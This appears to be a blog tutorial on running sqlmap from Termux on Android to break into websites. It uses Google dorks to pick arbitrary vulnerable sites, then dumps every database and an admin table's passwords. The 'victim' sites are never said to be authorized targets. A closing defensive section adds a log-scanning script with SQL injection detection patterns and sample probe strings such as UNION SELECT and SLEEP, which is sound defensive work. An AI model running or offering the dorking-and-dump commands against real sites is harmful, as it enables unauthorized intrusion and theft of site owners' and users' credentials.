Hack Website Using SQLMAP Android



sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Requirements

Termux (a Linux terminal that contains many inbuilt commands)
Sqlmap (most important, used for SQL injection)
File manager (to view the log & db)

Patience & brain

SQLMAP On Android : Installation

First install all the apps from the above links and run them at least once. Download the sqlmap zip file, extract it to the sdcard and change its name.

After that, open Termux and run the given command.

apt update && apt upgrade

It takes some time to update. It will prompt you that some space is required; simply press y for yes to install. The installed files take only a small amount of space.
If you are using a phone with Android version 6.0+, then you need to run this command; on a lower version you can simply skip it. It’s not mandatory, but I suggest you run it.

termux-setup-storage

It will prompt you to allow permission to use your internal storage. To proceed, just hit the Allow button and follow the next step.

pkg install python2

This command will install Python in your Termux. It asks you to confirm the installation; enter y to install python2.

Moving On!

All set! You just need to find the sqlmap.py script on your phone. To do this, navigate using cd. First you need to access the root folder, so first run:

cd /

Then type & hit

cd sdcard
ls

It will show all the files it contains. Now you need to find sqlmap-master (the extracted folder).

cd sqlmap-master 

cd sqlmap-master

Enter sqlmap-master (above command) two times.

If you already changed the name of sqlmap-master to sqlmap then you can run,

cd sqlmap

cd sqlmap-master

You can use the “ls” command to list all the files in that location.
Navigate to the sqlmap-master folder where sqlmap.py is stored. Now, to run sqlmap you need the following command:

python2 sqlmap.py

If you see this red-colored sqlmap, then relax! You are done with the installation of sqlmap. Now the next step is hacking the website using sqlmap. You need to find a website with an SQL vulnerability. For this, use sqlmap google dork to find websites.
If you are using google dork then type the following:

python2 sqlmap.py -g  your_keyword

If you want to use a direct URL then:

python2 sqlmap.py -u your_url

You can refer to the sqlmap official site for help, or just type python2 sqlmap.py -h for basic help and python2 sqlmap.py -hh for advanced help.

If you want to hack the entire site with all databases and tables, just append -a to either of the commands python2 sqlmap.py -g your_keyword or python2 sqlmap.py -u your_url
In the google dork method, it will give you three options:
1. Yes for attacking the first site that comes up in the results. To proceed further, you need to type “y”.
2. For skipping to the next target you can use “n”.
3. For quitting, use “q”.

Get Set Attack!

After that it will start the attack on the victim site. Wait until it completes. It may prompt you with the following question, so simply hit “y”.

After that it will show you several tables and other data that it hacked. Don’t worry, you can view it in the log when the process is done.

Now if you want to see all the tables, you need to run the following command:

python2 sqlmap.py -u url --tables

It will return the names of all tables that are already hacked by sqlmap. Now choose the table you want to view by simply entering the following command. In my case I want to view the admin table. To view the password, I run

python2 sqlmap.py -u url -T your_table_name

This command will save your table data and log file in the root folder, which is not accessible on a normal non-rooted phone. But no worry, we have a solution: this terminal can access it, so we are going to copy this file to your internal storage so it can also be viewed on a non-rooted phone.

cp source /sdcard

Just replace source in the above command with the source given by the terminal. It will omit the dump file, but don’t worry, we don’t need it. Now navigate to the file using your inbuilt file manager or use ES file manager.



Congo! You successfully hacked a website using sqlmap with SQL injection on Android.
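From the defending side, sqlmap run as in the commands above sends its default User-Agent header, which begins with sqlmap/, and its probes carry SQL keywords in the request line. The shell script below is an added example, not part of the original post: it assumes an access log in the Apache/nginx combined format, and the log lines, IP addresses and function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag likely sqlmap traffic in a web server access log.
# Assumption: the log uses the Apache/nginx "combined" format.

# Constructed sample log (documentation IP ranges, made-up paths).
write_sample_log() {
cat > "$1" <<'EOF'
198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
198.51.100.7 - - [10/Mar/2024:10:00:02 +0000] "GET /item.php?id=1%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
198.51.100.7 - - [10/Mar/2024:10:00:03 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%20NULL HTTP/1.1" 500 90 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Mar/2024:10:01:00 +0000] "GET /item.php?id=2 HTTP/1.1" 200 530 "-" "Mozilla/5.0 (Linux; Android 13)"
203.0.113.20 - - [10/Mar/2024:10:02:00 +0000] "GET /item.php?id=3%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 530 "-" "Mozilla/5.0 (X11; Linux x86_64)"
EOF
}

# Check 1: requests whose User-Agent starts with sqlmap's default "sqlmap/".
# Prints "<client-ip> <request-count>" per client, sorted by IP.
sqlmap_ua_clients() {
    awk -F'"' '$6 ~ /^sqlmap\// { split($1, a, " "); n[a[1]]++ }
        END { for (ip in n) print ip, n[ip] }' "$1" | sort
}

# Check 2: the header is client-controlled, so also look for SQL keywords
# in the request line itself, whatever the User-Agent says.
# Same output format as check 1.
sqli_probe_clients() {
    awk -F'"' '{ req = toupper($2) }
        req ~ /UNION.*SELECT|SLEEP[(]|AND(%20|[+])[0-9]+=[0-9]+/ {
            split($1, a, " "); n[a[1]]++ }
        END { for (ip in n) print ip, n[ip] }' "$1" | sort
}

# Run both checks over the constructed sample.
log=$(mktemp)
write_sample_log "$log"
echo "Clients sending the default sqlmap User-Agent:"
sqlmap_ua_clients "$log"
echo "Clients sending SQL keywords in the request line:"
sqli_probe_clients "$log"
rm -f "$log"
```

The keyword patterns are a small constructed set for this sample; a production rule set would be broader and tuned against false positives.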